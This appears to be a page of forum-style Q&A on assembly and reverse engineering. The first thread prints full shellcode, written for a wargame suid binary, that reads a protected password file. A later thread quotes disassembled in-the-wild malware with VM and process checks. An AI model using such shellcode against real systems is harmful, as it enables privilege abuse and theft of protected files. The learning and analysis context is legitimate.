PTRACE_TRACEME without parent - ptrace

I'm trying, for fun, to exploit a program that uses ptrace to prevent debugging. The executable is suid, so there is no use in cracking it.
It also has an executable stack segment. The executable is made for playing. After finding a vulnerability in it myself, I tried a buffer overflow. I wrote shellcode that launches a shell, and to my surprise it hangs (bash reports that the process has been stopped). After some tests, I came to the conclusion that ptrace not only prevents debugging but also prevents my shellcode from executing.
Reading about ptrace, I found that a process which invokes ptrace(PTRACE_TRACEME,0,1,0) will be stopped as soon as it invokes the exec syscall. So I changed strategy: since ptrace stops the process as soon as it launches an executable, I tried shellcode that reads a file. My objective is not to launch a shell, but to read a file that my user has no permission to read. In the end, this code also hung.
Can anyone explain why my code hangs even though it contains no exec call?
Is there any way to stop the ptrace from within the process itself?
In my case, the ptraced process has no parent and runs with higher privileges because of the suid bit. How can it be controlled?
Here is my shellcode, which should not contain any exec:
0: 31 c0 xor eax,eax
2: 31 db xor ebx,ebx
4: 31 c9 xor ecx,ecx
6: 31 d2 xor edx,edx
8: eb 38 jmp 0x42
a: 5b pop ebx
b: c6 43 13 01 mov BYTE PTR [ebx+0x13],0x1
f: fe 4b 13 dec BYTE PTR [ebx+0x13]
12: b0 05 mov al,0x5
14: 31 c9 xor ecx,ecx
16: cd 80 int 0x80
18: 89 c6 mov esi,eax
1a: eb 06 jmp 0x22
1c: b0 01 mov al,0x1
1e: 31 db xor ebx,ebx
20: cd 80 int 0x80
22: 89 f3 mov ebx,esi
24: b0 03 mov al,0x3
26: 83 ec 01 sub esp,0x1
29: 89 e1 mov ecx,esp
2b: b2 01 mov dl,0x1
2d: cd 80 int 0x80
2f: 31 db xor ebx,ebx
31: 39 c3 cmp ebx,eax
33: 74 e7 je 0x1c
35: b0 04 mov al,0x4
37: b3 01 mov bl,0x1
39: b2 01 mov dl,0x1
3b: cd 80 int 0x80
3d: 83 c4 01 add esp,0x1
40: eb e0 jmp 0x22
42: e8 c3 ff ff ff call 0xa
47: db '/home/level8/passwd'

I believe you have a core misunderstanding of how ptrace works.
When the process stops after calling execve, that is a good thing. It means your debugger gets a chance to change things around, both before and after the execve.
It seems to me that you wrote ptrace(PTRACE_TRACEME) in the child but have not implemented any of the parent-side support you should have. As a result, as soon as ptrace tries to notify the debugger of an event, your process stops and is never restarted.
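To make the "parent side support" concrete, here is a minimal sketch in C, assuming Linux and a tracer that is simply the forking parent. The helper name run_traced is hypothetical and not taken from the question. It shows the loop that has to exist somewhere: wait for each stop and resume the tracee with PTRACE_CONT.

```c
#include <signal.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (not from the question): runs `prog` under a minimal
 * tracer and returns how many ptrace stops the parent had to resume,
 * or -1 on error. */
int run_traced(const char *prog)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: ask to be traced by the parent, then exec. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(126);
        execlp(prog, prog, (char *)NULL);
        _exit(127); /* only reached if exec failed */
    }

    int stops = 0;
    for (;;) {
        int status;
        if (waitpid(pid, &status, 0) == -1)
            return -1;
        if (WIFEXITED(status) || WIFSIGNALED(status))
            return stops;
        if (WIFSTOPPED(status)) {
            int sig = WSTOPSIG(status);
            stops++;
            /* Swallow the SIGTRAP generated by exec; forward any other signal. */
            long forward = (sig == SIGTRAP) ? 0 : sig;
            if (ptrace(PTRACE_CONT, pid, NULL, (void *)forward) == -1)
                return -1;
        }
    }
}
```

Calling run_traced("true") should report at least one stop (the one caused by exec). If nothing ever issues the PTRACE_CONT, the tracee stays stopped, which matches the hang described in the question.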

Related

Errata in "Practical Reverse Engineering"?

I've just started the book Practical Reverse Engineering by Bruce Dang et alia, and am confused about a portion of the "walk-through" at the end of chapter one. This is the relevant portion of code:
65: ...
66: loc_10001d16:
67: mov eax, [ebp-118h]
68: mov ecx, [ebp-128h]
69: jmp short loc_10001d2a (line 73)
70: loc_10001d24:
71: mov eax, [ebp+0ch]
72: mov ecx, [ebp+0ch]
73: loc_10001d2a:
74: cmp eax, ecx
75: pop esi
76: jnz short loc_10001D38 (line 82)
77: xor eax, eax
78: pop edi
79: mov esp, ebp
80: pop ebp
81: retn 0ch
82: ...
And the authors' commentary:
"After the loop exits, execution resumes at line 66. Lines 67–68 save the matching PROCESSENTRY32’s th32ParentProcessID/th32ProcessID in EAX/ECX and
continue execution at 73. Notice that Line 66 is also a jump target in line 43.
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check
whether it is 0 (DLL_PROCESS_DETACH). If it is, the return value is set to 0 and
it returns; otherwise, it goes to line 82."
This is not how I interpreted the code when reading it; surely any jump to loc_10001d24 (line 70) will cause the function to terminate with return value 0 unconditionally, and not only if the value at ebp+0x0c is 0? (I assume that popping into esi does not affect the eflags register, and that the jump in line 76 depends on the result of cmp eax, ecx in line 74?) This is also consistent with earlier portions of the code, which jump to loc_10001d24 if various called functions return values indicating failure.
In addition, I thought the point of the section starting at line 66 was to also return with value 0 if PROCESSENTRY32 (a structure defined earlier, starting at position ebp-0x130 in memory) has equal th32ParentProcessID (ebp-0x118 in memory) and th32ProcessID (ebp-0x128 in memory) entries; is this correct? The authors' commentary did not seem to indicate this.
As a more general question, even just chapter 1 of the book seems to have quite a large number of typos; does anyone know of a webpage collecting errata for the book?
Yes, ECX and EAX are both loaded from the same memory location, so unless something else has a pointer to it and is changing it asynchronously, cmp x,x / jne will always be not-taken. Unlike floating-point, every possible integer is equal to itself.
And you're correct, pop doesn't change EFLAGS, as per Intel's manuals: https://www.felixcloutier.com/x86/pop.
To check whether a memory location is zero, you can load it into a reg for test eax,eax / jnz
or cmp dword ptr [ebp + 0xc], 0 / jne.
(JNE and JNZ are the same instruction; the different mnemonics let you express the semantic meanings of equality or directly being zero based on ZF being set according to the value itself.)
Lines 70–74 read the fdwReason parameter of DllMain (EBP+C) and check whether it is 0 (DLL_PROCESS_DETACH)
This is bogus. If the book is full of stuff like that, that doesn't sound like a good book.
The cmp eax,ecx only makes any sense when reached from the path that loaded 2 different values. (And you couldn't use test for that: x & y != 0 doesn't tell you whether they were equal.) This seems unlikely to be real compiler output.
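The two points above (an integer always compares equal to itself, and test cannot replace cmp for an equality check) can be illustrated in C. This is only a sketch: the function names are made up for illustration, and the C operators stand in for what the flag-setting instructions compute.

```c
#include <math.h>
#include <stdbool.h>
#include <stdint.h>

/* Models cmp a, b / je: ZF is set exactly when a - b == 0. */
bool cmp_says_equal(uint32_t a, uint32_t b) { return a == b; }

/* Models test a, b / jnz: only reports whether a & b has any bit set. */
bool test_says_nonzero(uint32_t a, uint32_t b) { return (a & b) != 0; }

/* Comparing a value with itself, as the code at loc_10001d24 effectively does. */
bool int_equals_itself(uint32_t x) { return cmp_says_equal(x, x); }

/* The floating-point exception: NaN compares unequal to itself. */
bool double_equals_itself(double x)
{
    volatile double y = x; /* volatile keeps the comparison from being folded away */
    return y == y;
}
```

For example, test_says_nonzero(3, 1) is true although 3 != 1, and test_says_nonzero(0, 0) is false although the operands are equal, so the AND result says nothing about equality.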
This is the full listing. It's part of malware found in the wild:
01: ; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
02: _DllMain@12 proc near
03: 55 push ebp
04: 8B EC mov ebp, esp
05: 81 EC 30 01 00+ sub esp, 130h
06: 57 push edi
07: 0F 01 4D F8 sidt fword ptr [ebp-8]
08: 8B 45 FA mov eax, [ebp-6]
09: 3D 00 F4 03 80 cmp eax, 8003F400h
10: 76 10 jbe short loc_10001C88 (line 18)
11: 3D 00 74 04 80 cmp eax, 80047400h
12: 73 09 jnb short loc_10001C88 (line 18)
13: 33 C0 xor eax, eax
14: 5F pop edi
15: 8B E5 mov esp, ebp
16: 5D pop ebp
17: C2 0C 00 retn 0Ch
18: loc_10001C88:
19: 33 C0 xor eax, eax
20: B9 49 00 00 00 mov ecx, 49h
21: 8D BD D4 FE FF+ lea edi, [ebp-12Ch]
22: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 0
23: 50 push eax
24: 6A 02 push 2
25: F3 AB rep stosd
26: E8 2D 2F 00 00 call CreateToolhelp32Snapshot
27: 8B F8 mov edi, eax
28: 83 FF FF cmp edi, 0FFFFFFFFh
29: 75 09 jnz short loc_10001CB9 (line 35)
30: 33 C0 xor eax, eax
31: 5F pop edi
32: 8B E5 mov esp, ebp
33: 5D pop ebp
34: C2 0C 00 retn 0Ch
35: loc_10001CB9:
36: 8D 85 D0 FE FF+ lea eax, [ebp-130h]
37: 56 push esi
38: 50 push eax
39: 57 push edi
40: C7 85 D0 FE FF+ mov dword ptr [ebp-130h], 128h
41: E8 FF 2E 00 00 call Process32First
42: 85 C0 test eax, eax
43: 74 4F jz short loc_10001D24 (line 70)
44: 8B 35 C0 50 00+ mov esi, ds:_stricmp
45: 8D 8D F4 FE FF+ lea ecx, [ebp-10Ch]
46: 68 50 7C 00 10 push 10007C50h
47: 51 push ecx
48: FF D6 call esi
49: 83 C4 08 add esp, 8
50: 85 C0 test eax, eax
51: 74 26 jz short loc_10001D16 (line 66)
52: loc_10001CF0:
53: 8D 95 D0 FE FF+ lea edx, [ebp-130h]
54: 52 push edx
55: 57 push edi
56: E8 CD 2E 00 00 call Process32Next
57: 85 C0 test eax, eax
58: 74 23 jz short loc_10001D24 (line 70)
59: 8D 85 F4 FE FF+ lea eax, [ebp-10Ch]
60: 68 50 7C 00 10 push 10007C50h
61: 50 push eax
62: FF D6 call esi
63: 83 C4 08 add esp, 8
64: 85 C0 test eax, eax
65: 75 DA jnz short loc_10001CF0 (line 52)
66: loc_10001D16:
67: 8B 85 E8 FE FF+ mov eax, [ebp-118h]
68: 8B 8D D8 FE FF+ mov ecx, [ebp-128h]
69: EB 06 jmp short loc_10001D2A (line 73)
70: loc_10001D24:
71: 8B 45 0C mov eax, [ebp+0Ch]
72: 8B 4D 0C mov ecx, [ebp+0Ch]
73: loc_10001D2A:
74: 3B C1 cmp eax, ecx
75: 5E pop esi
76: 75 09 jnz short loc_10001D38 (line 82)
77: 33 C0 xor eax, eax
78: 5F pop edi
79: 8B E5 mov esp, ebp
80: 5D pop ebp
81: C2 0C 00 retn 0Ch
82: loc_10001D38:
83: 8B 45 0C mov eax, [ebp+0Ch]
84: 48 dec eax
85: 75 15 jnz short loc_10001D53 (line 93)
86: 6A 00 push 0
87: 6A 00 push 0
88: 6A 00 push 0
89: 68 D0 32 00 10 push 100032D0h
90: 6A 00 push 0
91: 6A 00 push 0
92: FF 15 20 50 00+ call ds:CreateThread
93: loc_10001D53:
94: B8 01 00 00 00 mov eax, 1
95: 5F pop edi
96: 8B E5 mov esp, ebp
97: 5D pop ebp
98: C2 0C 00 retn 0Ch
99: _DllMain@12 endp
So lines 70-74 make no sense on their own, but do serve the original purpose: if either Process32First() or Process32Next() returns FALSE, the code jumps here and eventually exits with 0.
And if the desired process was found, eax/ecx are set to th32ParentProcessID/th32ProcessID respectively, so the comparison is meaningful and the function continues only if the two differ.
Anyway, there are also lines 83-85, about which the book states:
...with lpStartAddress as 0x100032D0. This block can be decompiled as follows:
if (fdwReason == DLL_PROCESS_DETACH) { return FALSE; }
if (fdwReason == DLL_THREAD_ATTACH || fdwReason == DLL_THREAD_DETACH) { return TRUE; }
CreateThread(0, 0, (LPTHREAD_START_ROUTINE) 0x100032D0, 0, 0, 0);
return TRUE;
Lines 83-85 actually check if fdwReason equals DLL_PROCESS_ATTACH or not (bypassing the call to CreateThread if not, which makes perfect sense), and there's no special case for DLL_PROCESS_DETACH.
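As a rough sketch of that reading, here is a portable C model of lines 66-98. It is not a decompilation of the real binary: the function name dllmain_tail and its parameters are hypothetical, the Windows calls are replaced by plain arguments, and the DLL_* constants are redefined locally with their Windows SDK values so that the snippet compiles anywhere.

```c
#include <stdbool.h>
#include <stdint.h>

/* fdwReason values, redefined here with the values used by the Windows SDK. */
enum {
    DLL_PROCESS_DETACH = 0,
    DLL_PROCESS_ATTACH = 1,
    DLL_THREAD_ATTACH  = 2,
    DLL_THREAD_DETACH  = 3
};

/* Hypothetical model of lines 66-98 of the listing.
 * found:      true when the _stricmp loop matched (path through loc_10001D16)
 * parent_pid: th32ParentProcessID of the matching entry ([ebp-118h])
 * pid:        th32ProcessID of the matching entry ([ebp-128h])
 * Sets *thread_created where the original would call CreateThread. */
int dllmain_tail(uint32_t fdwReason, bool found,
                 uint32_t parent_pid, uint32_t pid, bool *thread_created)
{
    uint32_t eax, ecx;
    *thread_created = false;

    if (found) {            /* lines 67-68 */
        eax = parent_pid;
        ecx = pid;
    } else {                /* lines 71-72: same value loaded twice */
        eax = fdwReason;
        ecx = fdwReason;
    }

    if (eax == ecx)         /* lines 74-81 */
        return 0;

    if (fdwReason == DLL_PROCESS_ATTACH)   /* lines 83-92 */
        *thread_created = true;

    return 1;               /* lines 94-98 */
}
```

In this model a DLL_PROCESS_DETACH call with a matching process whose IDs differ returns 1 without creating a thread, which is the behaviour described above rather than the one in the book's decompilation.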
I'll say that the book certainly lacks proper structure: some things it takes for granted, while other, maybe mundane, things are emphasized. Still a very good resource.
Oh well, who said this was easy.

Why do I find some never called instructions nopl, nopw after ret or jmp in GCC compiled code? [duplicate]

I've been working with C for a short while and very recently started to get into ASM. When I compile a program:
int main(void)
{
    int a = 0;
    a += 1;
    return 0;
}
The objdump disassembly has the code, but nops after the ret:
...
08048394 <main>:
8048394: 55 push %ebp
8048395: 89 e5 mov %esp,%ebp
8048397: 83 ec 10 sub $0x10,%esp
804839a: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp)
80483a1: 83 45 fc 01 addl $0x1,-0x4(%ebp)
80483a5: b8 00 00 00 00 mov $0x0,%eax
80483aa: c9 leave
80483ab: c3 ret
80483ac: 90 nop
80483ad: 90 nop
80483ae: 90 nop
80483af: 90 nop
...
From what I learned, nops do nothing, and since they come after ret they wouldn't even be executed.
My question is: why bother? Couldn't ELF (linux-x86) work with a .text section (+main) of any size?
I'd appreciate any help, just trying to learn.
First of all, gcc doesn't always do this. The padding is controlled by -falign-functions, which is automatically turned on by -O2 and -O3:
-falign-functions
-falign-functions=n
Align the start of functions to the next power-of-two greater than n, skipping up to n bytes. For instance,
-falign-functions=32 aligns functions to the next 32-byte boundary, but -falign-functions=24 would align to the next 32-byte boundary only
if this can be done by skipping 23 bytes or less.
-fno-align-functions and -falign-functions=1 are equivalent and mean that functions will not be aligned.
Some assemblers only support this flag when n is a power of two; in
that case, it is rounded up.
If n is not specified or is zero, use a machine-dependent default.
Enabled at levels -O2, -O3.
There could be multiple reasons for doing this, but the main one on x86 is probably this:
Most processors fetch instructions in aligned 16-byte or 32-byte blocks. It can be
advantageous to align critical loop entries and subroutine entries by 16 in order to minimize
the number of 16-byte boundaries in the code. Alternatively, make sure that there is no 16-byte boundary in the first few instructions after a critical loop entry or subroutine entry.
(Quoted from "Optimizing subroutines in assembly language" by Agner Fog.)
edit: Here is an example that demonstrates the padding:
// align.c
int f(void) { return 0; }
int g(void) { return 0; }
When compiled using gcc 4.4.5 with default settings, I get:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
000000000000000b <g>:
b: 55 push %rbp
c: 48 89 e5 mov %rsp,%rbp
f: b8 00 00 00 00 mov $0x0,%eax
14: c9 leaveq
15: c3 retq
Specifying -falign-functions gives:
align.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <f>:
0: 55 push %rbp
1: 48 89 e5 mov %rsp,%rbp
4: b8 00 00 00 00 mov $0x0,%eax
9: c9 leaveq
a: c3 retq
b: eb 03 jmp 10 <g>
d: 90 nop
e: 90 nop
f: 90 nop
0000000000000010 <g>:
10: 55 push %rbp
11: 48 89 e5 mov %rsp,%rbp
14: b8 00 00 00 00 mov $0x0,%eax
19: c9 leaveq
1a: c3 retq
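The amount of padding in these listings follows from simple address arithmetic. Below is a small sketch in C. The helper names are mine, and aligned_start is only a model of the rule quoted from the GCC documentation above, not GCC's actual implementation.

```c
#include <stdint.h>

/* Bytes needed to advance addr to the next multiple of align.
 * align must be a power of two. */
uint64_t padding_for(uint64_t addr, uint64_t align)
{
    return (align - (addr & (align - 1))) & (align - 1);
}

/* Smallest power of two that is >= n. */
static uint64_t pow2_at_least(uint64_t n)
{
    uint64_t p = 1;
    while (p < n)
        p <<= 1;
    return p;
}

/* Model of the quoted -falign-functions=n rule: align to the power-of-two
 * boundary, but only if that skips fewer than n bytes. */
uint64_t aligned_start(uint64_t addr, uint64_t n)
{
    if (n <= 1)
        return addr; /* -falign-functions=1 means no alignment */
    uint64_t pad = padding_for(addr, pow2_at_least(n));
    return pad < n ? addr + pad : addr;
}
```

With these helpers, padding_for(0xb, 16) is 5, which matches the two-byte jmp plus three nops between f and g, and padding_for(0x80483ac, 16) is 4, which matches the four nops after main in the question.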
This is done to align the next function to an 8-, 16- or 32-byte boundary.
From “Optimizing subroutines in assembly language” by A.Fog:
11.5 Alignment of code
Most microprocessors fetch code in aligned 16-byte or 32-byte blocks. If an important subroutine entry or jump label happens to be near the end of a 16-byte block then the microprocessor will only get a few useful bytes of code when fetching that block of code. It may have to fetch the next 16 bytes too before it can decode the first instructions after the label. This can be avoided by aligning important subroutine entries and loop entries by 16.
[...]
Aligning a subroutine entry is as simple as putting as many NOP's as needed before the subroutine entry to make the address divisible by 8, 16, 32 or 64, as desired.
As far as I remember, instructions are pipelined in the CPU, and different CPU blocks (loader, decoder and such) process subsequent instructions. When a RET instruction is being executed, the next few instructions are already loaded into the CPU pipeline. It's a guess, but you can start digging here, and if you find out more (maybe the specific number of NOPs that are safe), please share your findings.

gcc likely() unlikely() macros and assembly code

I'm trying to see how gcc's likely() and unlikely() branch prediction macros affect the assembly code. In the following piece of code I don't see any difference in the generated assembly regardless of which macro I use. Any pointers on what's happening?
int main() {
    volatile int x;
    unlikely(x)?x++:x--;
}
Asm code:
0000000000000014 <main>:
int main() {
14: 55 push rbp
15: 48 89 e5 mov rbp,rsp
volatile int x;
likely(x)?x++:x--;
18: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
1b: 85 c0 test eax,eax
1d: 0f 95 c0 setne al
20: 0f b6 c0 movzx eax,al
23: 48 85 c0 test rax,rax
26: 74 0b je 33 <main+0x1f>
28: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
2b: 83 c0 01 add eax,0x1
2e: 89 45 fc mov DWORD PTR [rbp-0x4],eax
31: eb 09 jmp 3c <main+0x28>
33: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
36: 83 e8 01 sub eax,0x1
39: 89 45 fc mov DWORD PTR [rbp-0x4],eax
}
3c: 5d pop rbp
3d: c3 ret
It looks like you compiled without optimization. Basic block reordering is an optimization, so without it, __builtin_expect does not have this effect. With optimization, I observe that the sense of the branch is inverted when switching the expected result.
Note that whether this has any effect on current x86 processors is difficult to say.
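For reference, here is a minimal sketch of how these macros are commonly defined on top of __builtin_expect (GCC and Clang only). The question does not show its own definitions, so these are an assumption, and the two wrapper functions are hypothetical names added so that the result can be inspected.

```c
/* Common definitions built on the GCC/Clang builtin. Assumed here, since
 * the question does not show the definitions it used. */
#define likely(x)   __builtin_expect(!!(x), 1)
#define unlikely(x) __builtin_expect(!!(x), 0)

/* Same logic with opposite hints. The hint changes code layout only,
 * never the computed result. */
int step_likely(int x)   { return likely(x)   ? x + 1 : x - 1; }
int step_unlikely(int x) { return unlikely(x) ? x + 1 : x - 1; }
```

Compiling this with gcc -O2 -S and comparing the two functions is one way to look for a layout difference; at -O0 the hint is not expected to change anything.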

What's the purpose of signal@plt in this example

What does callq 400b90 <signal@plt> do?
What would it look like in C?
4013a2: 48 83 ec 08 sub $0x8,%rsp
4013a6: be a0 12 40 00 mov $0x4012a0,%esi
4013ab: bf 02 00 00 00 mov $0x2,%edi
4013b0: e8 db f7 ff ff callq 400b90 <signal@plt>
4013b5: 48 83 c4 08 add $0x8,%rsp
4013b9: c3 retq
What does callq 400b90 <signal@plt> do?
It calls the signal function via the PLT (procedure linkage table). More technically: it pushes the return address (the address of the next instruction) onto the stack and jumps to signal@plt.
What would it look like in C?
void* foo(void) {
    return signal(2, (void *) 0x4012a0);
}
Let's look at your code line-by-line:
sub $0x8,%rsp
This reserves some stack space. You can ignore this (the stack space is unused).
mov $0x4012a0,%esi
mov $0x2,%edi
Put the values 0x4012a0 and 0x2 in the registers ESI and EDI. Under the x86-64 System V ABI, this is how arguments are passed to a function: EDI holds the first argument and ESI the second.
callq 400b90 <signal@plt>
Call the function signal through the PLT. The PLT has something to do with the dynamic linker, since we cannot be sure where the signal function will end up in memory when this is built. Basically, this just finds the final memory location and calls signal.
add $0x8,%rsp
retq
Undo the sub from earlier and return to the caller.
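Written with symbolic names instead of raw numbers, the same call might look like the sketch below. It assumes Linux, where signal number 2 is SIGINT. The handler on_sigint is hypothetical and stands in for whatever code lives at 0x4012a0, which the disassembly does not show.

```c
#include <signal.h>

typedef void (*handler_fn)(int);

static volatile sig_atomic_t got_sigint = 0;

/* Hypothetical handler standing in for the function at 0x4012a0. */
static void on_sigint(int signo)
{
    (void)signo;
    got_sigint = 1;
}

/* Counterpart of the disassembled function: installs the handler for
 * signal 2 (SIGINT on Linux) and passes through signal()'s return value. */
handler_fn install_handler(void)
{
    return signal(SIGINT, on_sigint);
}

/* Lets a caller check whether the handler has run. */
int sigint_seen(void)
{
    return got_sigint;
}
```

After install_handler() succeeds, pressing Ctrl-C or calling raise(SIGINT) runs on_sigint instead of terminating the process.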

Why do we allocate 12 bytes for each variable?

In Visual Studio 2010 Professional (x86, Windows 7):
... more
00DC1362 B9 39 00 00 00 mov ecx,39h
00DC1367 B8 CC CC CC CC mov eax,0CCCCCCCCh
00DC136C F3 AB rep stos dword ptr es:[edi]
20: int a = 3;
00DC136E C7 45 F8 03 00 00 00 mov dword ptr [ebp-8],3
21: int b = 10;
00DC1375 C7 45 EC 0A 00 00 00 mov dword ptr [ebp-14h],0Ah
22: int c;
23: c = a + b;
00DC137C 8B 45 F8 mov eax,dword ptr [ebp-8]
00DC137F 03 45 EC add eax,dword ptr [ebp-14h]
00DC1382 89 45 E0 mov dword ptr [ebp-20h],eax
24: return 0;
Notice how the ebp-relative addresses of variables a and b are not spaced by the word size of 4?
What is happening here?
Also, why do we skip the bytes before ebp-8?
Turning off the optimization will show the ideal addressing scheme.
Can someone please explain the reason? Thanks.
The offset of each variable is 12 bytes. A -> B -> C
I made a mistake. I meant why do we skip the first 8 bytes.
You are looking at the code generated by the default Debug build setting, in particular the /RTC option (enable run-time error checks). Filling the stack frame with 0xcccccccc helps diagnose uninitialized variables; the gaps around the variables help diagnose buffer overflows.
There isn't much point in looking at this code, you are not going to ship that. It is purely a Debug build artifact, only there to help you get the bugs out of the code. None of it remains in the Release build.
